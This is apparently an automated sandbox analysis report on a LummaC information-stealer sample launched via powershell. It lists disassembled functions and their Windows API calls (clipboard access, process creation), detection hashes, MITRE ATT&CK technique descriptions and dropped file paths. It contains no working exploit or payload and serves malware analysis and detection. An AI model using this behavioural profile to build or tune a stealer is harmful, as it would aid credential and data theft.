Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Function 0043C180 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF

Function 00417DA7 Relevance: 1.5, APIs: 1, Instructions: 23processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,0000000C,00000000,00000000,?,?), ref: 00417DDE

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d5bd0d86c2a207b0b25f3335c198856b000c34ecc3d354c5810022b6b042cf7e
Instruction ID: 7cde67ad982e33068fceebcb4fdb90b5309e7722f8b5e7463ff5f8efe878fa2b
Opcode Fuzzy Hash: d5bd0d86c2a207b0b25f3335c198856b000c34ecc3d354c5810022b6b042cf7e
Instruction Fuzzy Hash: 1DE08671255301BFF7249F20EC13F6B7695BB45705F10053DB355A40E0E77165158609

Function 0043169A Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004316E1

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
Instruction ID: 88ab58616cf1dac6cba617d780c76543ffdeb80aa514c7c7d0db7b6f6353d972
Opcode Fuzzy Hash: 398b2808b458341c98a87bf67e0231988ff1e1ff89b83f4d85f076abaf8bf248
Instruction Fuzzy Hash: 0FF09EB8509342CFD394DF64C5A875BBBE0EB89348F01891CE4998B391DBB59548CF82

Function 00430469 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004304AC

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
Instruction ID: d25a5440729caa6a4a41176679ca809818bf9cac461bb09e9bc77660d505e8e6
Opcode Fuzzy Hash: c776e90b0c9c6af7e86a6e6b759a0e1348666aeaad21731c063a5846b902e991
Instruction Fuzzy Hash: 56F0D4B45093019FD314DF29D16871ABBF4FB88304F01991CE49ACB790C7B5AA48CF82

Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Non-executed Functions

Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON

Download Yara Rule

Strings

UGBY, xrefs: 00427708
$&, xrefs: 004275AF
EG, xrefs: 0042740B
w?n!, xrefs: 004272DD
U'g), xrefs: 004272F3
NO, xrefs: 00427361
g#X%, xrefs: 004272E8
FOEH, xrefs: 0042771E
l+X-, xrefs: 004272FE
+K!M, xrefs: 00427356
bweM, xrefs: 004276F0
;[0], xrefs: 0042732A
*W.Y, xrefs: 0042731F
>C7E, xrefs: 00427340
!, xrefs: 00427452
{7y9, xrefs: 004272C7

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID:
String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
API String ID: 0-3492884535
Opcode ID: eccaa5771665998240638737fb1425933b1c22948290d11a00596a8013fa42ea
Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
Opcode Fuzzy Hash: eccaa5771665998240638737fb1425933b1c22948290d11a00596a8013fa42ea
Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A

Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004329E2
GetClipboardData.USER32 ref: 00432A05
GlobalLock.KERNEL32 ref: 00432A22
GlobalUnlock.KERNEL32 ref: 00432B6B
CloseClipboard.USER32 ref: 00432B73

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797

Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431360

Strings

B, xrefs: 00431455
0, xrefs: 0043153F
;, xrefs: 004313DD
{, xrefs: 004314A7
O, xrefs: 00431441
4, xrefs: 004313E7
, xrefs: 00431405
J, xrefs: 0043144B
B, xrefs: 00431437
#, xrefs: 0043145F
n, xrefs: 00431497
0, xrefs: 004313F1
H, xrefs: 00431473
/, xrefs: 0043142D
G, xrefs: 00431469
m, xrefs: 0043147D
Q, xrefs: 00431419
^, xrefs: 00431423
], xrefs: 0043140F
~, xrefs: 00431487

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042E9F6
VariantInit.OLEAUT32 ref: 0042EA05

Strings

b, xrefs: 0042EA3C
(, xrefs: 0042EA80
*, xrefs: 0042EA88
T, xrefs: 0042EA24
0, xrefs: 0042EA60
:, xrefs: 0042EA48
2, xrefs: 0042EA68
,, xrefs: 0042EA90
<, xrefs: 0042EA50
6, xrefs: 0042EA78
., xrefs: 0042EA98
4, xrefs: 0042EA70
>, xrefs: 0042EA58
8, xrefs: 0042EA40
W, xrefs: 0042EA34
-, xrefs: 0042EA94
Q, xrefs: 0042EA2C

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6

Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F83F
VariantInit.OLEAUT32 ref: 0042F84E

Strings

T, xrefs: 0042F873
4, xrefs: 0042F8BF
,, xrefs: 0042F8DF
:, xrefs: 0042F897
>, xrefs: 0042F8A7
2, xrefs: 0042F8B7
(, xrefs: 0042F8CF
Q, xrefs: 0042F87B
-, xrefs: 0042F8E3
<, xrefs: 0042F89F
*, xrefs: 0042F8D7
., xrefs: 0042F8E7
b, xrefs: 0042F88B
8, xrefs: 0042F88F
6, xrefs: 0042F8C7
0, xrefs: 0042F8AF
W, xrefs: 0042F883

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66

Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043244F

Strings

@, xrefs: 004324A9
A, xrefs: 004324EA
e, xrefs: 004324B3
C, xrefs: 00432481
[, xrefs: 004324C7
E, xrefs: 00432495
J, xrefs: 0043248B
Q, xrefs: 0043249F
@, xrefs: 004324E5
X, xrefs: 00432477
[, xrefs: 004324DB
L, xrefs: 004324BD
X, xrefs: 0043246D
H, xrefs: 004324D1

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757

Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004321C6

Strings

X, xrefs: 004321EB
@, xrefs: 00432263
X, xrefs: 004321F5
J, xrefs: 00432209
[, xrefs: 00432259
C, xrefs: 004321FF
[, xrefs: 00432245
Q, xrefs: 0043221D
e, xrefs: 00432231
A, xrefs: 00432268
L, xrefs: 0043223B
@, xrefs: 00432227
H, xrefs: 0043224F
E, xrefs: 00432213

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757

Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431EE7
VariantInit.OLEAUT32 ref: 00431EFA

Strings

n, xrefs: 00431FAF
A, xrefs: 00431F8F
z, xrefs: 00431F6F
e, xrefs: 00431F1F
e, xrefs: 00431F5F
w, xrefs: 00431F4F
z, xrefs: 00431F2F
p, xrefs: 00431F9F
v, xrefs: 00431F3F
p, xrefs: 00431FBF

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Function 0040B390 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
FreeLibrary.KERNEL32 ref: 0040B3B7

Strings

u, xrefs: 0040B396, 0040B3B7

Memory Dump Source

Source File: 00000008.00000002.57429854591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_powershell.jbxd

Similarity

API ID: FreeLibrary
String ID: u
API String ID: 3664257935-873558754
Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.
Tactics:	Discovery
Data Sources:	Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\singl6[1].mp4

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ib0jx4n.dxz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gj3jmtjd.muo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0gauejz.kyd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvoifloc.let.ps1

